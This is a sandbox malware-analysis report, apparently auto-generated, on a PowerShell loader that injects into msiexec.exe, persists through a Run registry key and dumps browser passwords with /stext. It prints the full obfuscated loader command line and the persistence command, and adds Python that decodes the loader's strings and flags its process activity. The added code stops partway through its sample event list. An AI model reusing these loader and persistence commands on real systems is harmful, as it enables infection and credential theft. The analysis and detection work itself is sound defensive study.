                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,14_2_004044A4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_079397B5 push ebx; ret 5_2_079397B6
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_228F1219 push esp; iretd 8_2_228F121A
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_228E2806 push ecx; ret 8_2_228E2819
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0044693D push ecx; ret 14_2_0044694D
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0044DB70 push eax; ret 14_2_0044DB84
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0044DB70 push eax; ret 14_2_0044DBAC
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00451D54 push eax; ret 14_2_00451D61
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044B090 push eax; ret 15_2_0044B0A4
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044B090 push eax; ret 15_2_0044B0CC
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00451D34 push eax; ret 15_2_00451D41
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00444E71 push ecx; ret 15_2_00444E81
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00414060 push eax; ret 18_2_00414074
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00414060 push eax; ret 18_2_0041409C
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00414039 push ecx; ret 18_2_00414049
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_004164EB push 0000006Ah; retf 18_2_004165C4
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00416553 push 0000006Ah; retf 18_2_004165C4
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00416555 push 0000006Ah; retf 18_2_004165C4
                Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Aversi
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,15_2_004047CB
                Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5226
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4684
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6030
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3746
Source: C:\Windows\SysWOW64\msiexec.exe | API coverage: 8.9 %
Source: C:\Windows\SysWOW64\msiexec.exe | API coverage: 8.3 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 360 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6640 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6204 | Thread sleep count: 3456 > 30
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1520 | Thread sleep count: 5679 > 30
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1520 | Thread sleep time: -17037000s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe | Thread sleep count: Count: 3456 delay: -5
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_228E10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_228E6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_0040AE51 FindFirstFileW,FindNextFileW
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_00418981 memset,GetSystemInfo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: powershell.exe, 00000002.00000002.2241503546.000001DCC7D46000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWre%SystemRoot%\system32\mswsock.dlllGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN me
Source: msiexec.exe, 00000008.00000002.4512385168.0000000006AF0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.4512385168.0000000006B26000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B26000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW67.155.139;
Source: bhvC236.tmp.14.dr | Binary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
Source: C:\Windows\SysWOW64\msiexec.exe | API call chain: ExitProcess graph end node graph_15-34016
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

                Anti Debugging

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\msiexec.exe | Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\msiexec.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_04B396D9 LdrInitializeThunk,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_228E2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_228E4AB4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_228E724E GetProcessHeap
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_228E2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_228E2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_228E60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
Source: Yara match | File source: amsi64_5576.amsi.csv, type: OTHER
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5576, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6388, type: MEMORYSTR
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write (3 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4270000
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. 
HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. UndH.take LnnaDan dPerfePapfrDeoJump to behavior
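Every string the command line above needs is built at run time by the Taborets function: `for($Furcated=4; $Furcated -lt $Sirenize; $Furcated+=5){ $Nedlgger+=$Boejer[$Furcated] }`, where $Sirenize is the literal's length minus one (because $Baljers is incremented once per call whenever $host.UI exists, which it does in any real PowerShell host). So the decoder keeps every fifth character of a junk-padded literal, starting at index 4 and never reaching the trailing padding space, and the result is executed through `& ($Glassine)`, whose own literal decodes to IEX. The Python below is an added example, not code from the report or from the sample; it reimplements that decoder and runs it over two literals copied verbatim from the command line above. Some of the literals as rendered on this page (the long User-Agent string, for one) contain four-character groups where the scheme needs five, so those copies no longer decode cleanly; the two used here are intact.

```python
import re

# The loader's decoder: every fifth character from index 4, stopping one short of
# the end. The final character of each literal is a padding space and is dropped.
def taborets(blob: str, offset: int = 4, stride: int = 5) -> str:
    return "".join(blob[i] for i in range(offset, len(blob) - 1, stride))

# Each literal is passed to the decoder by name. The report prints both the
# original and a lower-cased copy of the command line, hence the [Tt].
LITERAL = re.compile(r"\b[Tt]aborets\s+'([^']*)'")

def decode_script(script: str) -> list[str]:
    """Plaintext of every Taborets '...' literal in the script, in order."""
    return [taborets(m.group(1)) for m in LITERAL.finditer(script)]

# Two literals copied verbatim from the command line in the report: the command
# name handed to the call operator, and the first statement executed through it.
SAMPLE_SCRIPT = (
    "$Glassine=Taborets 'AarsI Ci,EPri.XKard ';"
    "Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboI"
    "HypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprD"
    "Who.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');"
)

if __name__ == "__main__":
    for plain in decode_script(SAMPLE_SCRIPT):
        print(repr(plain))
```

The second literal decodes to `$global:Thioneine=$env:APPDATA+$Lizbeth` (the generator randomises letter case, which PowerShell ignores for variable names), i.e. the path under %APPDATA% where the loader writes its stage file `\aspargessuppens.Bri`.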
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)"
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qalgwws"
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\avqzpodslp"
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj" (3 occurrences)
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#buttresslike egenskabsvinduets whirlmagee sunkne tangibilities skivgatterne unpeacefully #>;$hypogeal='byggemodnedes';<#grasping pedestrianising kardon #>;$untroubledly=$telegrammes+$host.ui;function taborets($boejer){if ($untroubledly) {$baljers++;}$sirenize=$abintestate+$boejer.'length'-$baljers; for( $furcated=4;$furcated -lt $sirenize;$furcated+=5){$preidentification++;$nedlgger+=$boejer[$furcated];$fruehauf='kludging';}$nedlgger;}function politiseres($antiopelmous){ & ($glassine) ($antiopelmous);}$furcatedrrefragability=taborets 'unmom spholarrzeksai udal knlbloda und/magn ';$furcatedrrefragability+=taborets 'besv5tr c.gran0jam util(strowskadiskannhattd owlourdswbu sstils grunnv,sitlan, kand1aftn0zith. bop0turb;over intw traitougne te6temp4aarg;e nf n ggxgalo6lian4roeg;lol drecr resv bi :pent1rose3 ext1 kod. c f0arma)h ma subfgsulfeminucstank bedoe sp/ s.a2e,he0 mac1tilf0pine0bogt1pent0 til1te e afsf orki frergrafekl sfi deoka mxungd/clod1lady3.zil1omri.o sm0misk ';$drikkevandsforsyninger=taborets 'camaublgesce tecahir p a-teleaparegkomse opsntj,ntcent ';$engleskarers=taborets 'une hturat yeltsnohpkinesd.li:hexa/lagd/ phlmlipai rneounovtsupetkil oroupetri,zdos,a orun trieforblcec lr,deafdni. 
hencla.roremamster/spurh hjeofindv dolemoridthervem artradkconse taatneds.renlr ruam ltrspor ';$genhret=taborets ' ppe>emer ';$glassine=taborets 'aarsi ci,epri.xkard ';$balsameredes='mangfoldigste';$lizbeth='\aspargessuppens.bri';politiseres (taborets ' su,$karagmarelbuboo funbchorakastlgray: paltdenihemboihypeo dvrnstilef,avi ogpngrame pol= su $ fore gonnhjervbleg: gara i opdisrpunprdwho.ast rtbl ka,krm+inc $na klfo,kitan zbattbre.rearkatndudhravi ');politiseres (taborets 'alko$se vghaemlluftooralb ropan melopda:uncos s.laa,latflose obslcacql luni ci t uthb redyunseeclosrbraunteksede rsnrin=shr $redbeopgrnt,bugprivlsu aes mvs halkkabaa venrs teeb nkrste.s,pip.stndsforsp hrelhjeri undthulk(haar$surag some alfnravghcinnrc nte ogtbrne)hand ');politiseres (taborets ' ove[strinankeeperstkono.lills staeeksprs nhvinkpisygecinv e epap.urfosubti,nianjahvtpse.munexathe ntelea algargue plarergo]sate:dist: lims.astegydeccoppu enrfa iitildtskr y astp enfr nedod mptripeo indcnon,oautolavne g.aa=nona regr[refenhypeestratgly .ta.lsbnkbe pr.c s euc,mprtamuianthtenciystrap f.nr uzosekst isoomvrech anoabeflisoctnis,ycyanprettel,mi]s ir:nonc: indthvirl nedsmoon1pleb2d nk ');$engleskarers=$satellitbyernes[0];$faglrereksaminernes=(taborets 'koll$lejngmo ol ketoplatb kreawatelh dr:oretr medebedyg to eintelspermvelusnonss blii insgdataschecto on=unquncowaegelawclay-topfo ,rob bijj areerareckrakthiml sheesca iyexanscouptjollepylrmdeko.t len rase .igtchin.seglwforhe nneb ydrcurfjldil iubnde aponkviltkalv ');politiseres ($faglrereksaminernes);politiseres (taborets 'd lt$fnisr mile vi,gpartespaal m,dm lepsdiffs taiforlg onfscarrtskjt. undh.take lnnadan dperfepapfrdeo
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#buttresslike egenskabsvinduets whirlmagee sunkne tangibilities skivgatterne unpeacefully #>;$hypogeal='byggemodnedes';<#grasping pedestrianising kardon #>;$untroubledly=$telegrammes+$host.ui;function taborets($boejer){if ($untroubledly) {$baljers++;}$sirenize=$abintestate+$boejer.'length'-$baljers; for( $furcated=4;$furcated -lt $sirenize;$furcated+=5){$preidentification++;$nedlgger+=$boejer[$furcated];$fruehauf='kludging';}$nedlgger;}function politiseres($antiopelmous){ & ($glassine) ($antiopelmous);}$furcatedrrefragability=taborets 'unmom spholarrzeksai udal knlbloda und/magn ';$furcatedrrefragability+=taborets 'besv5tr c.gran0jam util(strowskadiskannhattd owlourdswbu sstils grunnv,sitlan, kand1aftn0zith. bop0turb;over intw traitougne te6temp4aarg;e nf n ggxgalo6lian4roeg;lol drecr resv bi :pent1rose3 ext1 kod. c f0arma)h ma subfgsulfeminucstank bedoe sp/ s.a2e,he0 mac1tilf0pine0bogt1pent0 til1te e afsf orki frergrafekl sfi deoka mxungd/clod1lady3.zil1omri.o sm0misk ';$drikkevandsforsyninger=taborets 'camaublgesce tecahir p a-teleaparegkomse opsntj,ntcent ';$engleskarers=taborets 'une hturat yeltsnohpkinesd.li:hexa/lagd/ phlmlipai rneounovtsupetkil oroupetri,zdos,a orun trieforblcec lr,deafdni. 
hencla.roremamster/spurh hjeofindv dolemoridthervem artradkconse taatneds.renlr ruam ltrspor ';$genhret=taborets ' ppe>emer ';$glassine=taborets 'aarsi ci,epri.xkard ';$balsameredes='mangfoldigste';$lizbeth='\aspargessuppens.bri';politiseres (taborets ' su,$karagmarelbuboo funbchorakastlgray: paltdenihemboihypeo dvrnstilef,avi ogpngrame pol= su $ fore gonnhjervbleg: gara i opdisrpunprdwho.ast rtbl ka,krm+inc $na klfo,kitan zbattbre.rearkatndudhravi ');politiseres (taborets 'alko$se vghaemlluftooralb ropan melopda:uncos s.laa,latflose obslcacql luni ci t uthb redyunseeclosrbraunteksede rsnrin=shr $redbeopgrnt,bugprivlsu aes mvs halkkabaa venrs teeb nkrste.s,pip.stndsforsp hrelhjeri undthulk(haar$surag some alfnravghcinnrc nte ogtbrne)hand ');politiseres (taborets ' ove[strinankeeperstkono.lills staeeksprs nhvinkpisygecinv e epap.urfosubti,nianjahvtpse.munexathe ntelea algargue plarergo]sate:dist: lims.astegydeccoppu enrfa iitildtskr y astp enfr nedod mptripeo indcnon,oautolavne g.aa=nona regr[refenhypeestratgly .ta.lsbnkbe pr.c s euc,mprtamuianthtenciystrap f.nr uzosekst isoomvrech anoabeflisoctnis,ycyanprettel,mi]s ir:nonc: indthvirl nedsmoon1pleb2d nk ');$engleskarers=$satellitbyernes[0];$faglrereksaminernes=(taborets 'koll$lejngmo ol ketoplatb kreawatelh dr:oretr medebedyg to eintelspermvelusnonss blii insgdataschecto on=unquncowaegelawclay-topfo ,rob bijj areerareckrakthiml sheesca iyexanscouptjollepylrmdeko.t len rase .igtchin.seglwforhe nneb ydrcurfjldil iubnde aponkviltkalv ');politiseres ($faglrereksaminernes);politiseres (taborets 'd lt$fnisr mile vi,gpartespaal m,dm lepsdiffs taiforlg onfscarrtskjt. undh.tak
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "aversi" /t reg_expand_sz /d "%afgrnsningsproblemer% -windowstyle 1 $predestinationism=(gp -path 'hkcu:\software\hovedparts\').bagateller;%afgrnsningsproblemer% ($predestinationism)"
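Three things in the process tree above are worth keying detections on. PowerShell runs with -windowstyle hidden and dispatches everything through a variable-named call operator (`& ($Glassine)`). Persistence is a Run value of type REG_EXPAND_SZ whose data begins with an environment variable (%Afgrnsningsproblemer%) rather than a binary and reads its real payload back out of HKCU\Software\hovedparts\Bagateller with `gp -Path`. And the injected msiexec.exe relaunches itself with `/stext` pointing into the user's Temp directory, the save-to-text switch of NirSoft's recovery utilities, which is what the WebBrowserPassView Yara hit in this report corresponds to. The Python below is an added example, not part of the report, that runs those checks over process-creation records. The records are constructed for the example and modelled on the "Process created" rows above (the PowerShell command line is abridged to the parts the rules inspect); the rule names and the SYSTEM_HOSTS list are my own choices.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """One process-creation record, as Sysmon event 1 or the sandbox's
    'Process created' rows report it."""
    image: str
    parent_image: str
    command_line: str

HIDDEN = re.compile(r"-w(?:indowstyle)?\s+(?:hidden|1)\b", re.I)
VAR_CALL = re.compile(r"&\s*\(\s*\$\w+\s*\)")                 # & ($Glassine) (...)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\b", re.I)
EXPAND_VAR_DATA = re.compile(r"\bREG_EXPAND_SZ\b.*?/d\s+\"?%\w+%", re.I | re.S)
REG_READBACK = re.compile(r"\b(?:gp|Get-ItemProperty)\s+-Path\s+'?HK", re.I)
STEXT = re.compile(r"/stext\s+\"?([^\"]+)", re.I)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
# Signed Windows binaries commonly used as hollowing hosts (assumed list).
SYSTEM_HOSTS = {"msiexec.exe", "regsvr32.exe", "rundll32.exe", "svchost.exe"}

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def split_cmdline(cl: str) -> tuple[str, str]:
    """Separate the (possibly quoted) executable from its arguments."""
    cl = cl.strip()
    if cl.startswith('"'):
        exe, _, rest = cl[1:].partition('"')
    else:
        exe, _, rest = cl.partition(" ")
    return exe, rest.strip()

def classify(ev: ProcEvent) -> list[str]:
    hits: list[str] = []
    img, parent, cl = basename(ev.image), basename(ev.parent_image), ev.command_line
    _, args = split_cmdline(cl)
    if img == "powershell.exe" and HIDDEN.search(cl) and VAR_CALL.search(cl):
        hits.append("hidden-window PowerShell dispatching through a variable-named call operator")
    if img == "reg.exe" and re.search(r"\badd\b", cl, re.I) and RUN_KEY.search(cl):
        if EXPAND_VAR_DATA.search(cl):
            hits.append("Run value is REG_EXPAND_SZ and starts with an environment variable, not a binary")
        if REG_READBACK.search(cl):
            hits.append("Run value reads its payload back out of another registry key")
    if img in SYSTEM_HOSTS and parent == "powershell.exe" and args == "":
        hits.append("system binary spawned by PowerShell with no arguments (injection host)")
    m = STEXT.search(cl)
    if m and img in SYSTEM_HOSTS and TEMP_DIR.search(m.group(1)):
        hits.append("/stext credential dump from a system binary into the user's Temp directory")
    return hits

def scan(events: list[ProcEvent]) -> list[list[str]]:
    """Rule hits per event, index-aligned with the input."""
    return [classify(e) for e in events]

# Constructed sample, modelled on the 'Process created' rows in the report.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\cmd.exe",
              'powershell.exe -windowstyle hidden " <#Buttresslike #>;'
              'function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}'
              "Politiseres (Taborets 'AarsI Ci,EPri.XKard ')\""),
    ProcEvent(r"C:\Windows\SysWOW64\msiexec.exe",
              r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\SysWOW64\msiexec.exe"'),
    ProcEvent(r"C:\Windows\SysWOW64\reg.exe",
              r"C:\Windows\SysWOW64\cmd.exe",
              r'REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" '
              r'/t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 '
              r"$Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;"
              r'%Afgrnsningsproblemer% ($Predestinationism)"'),
    ProcEvent(r"C:\Windows\SysWOW64\msiexec.exe",
              r"C:\Windows\SysWOW64\msiexec.exe",
              r'C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qalgwws"'),
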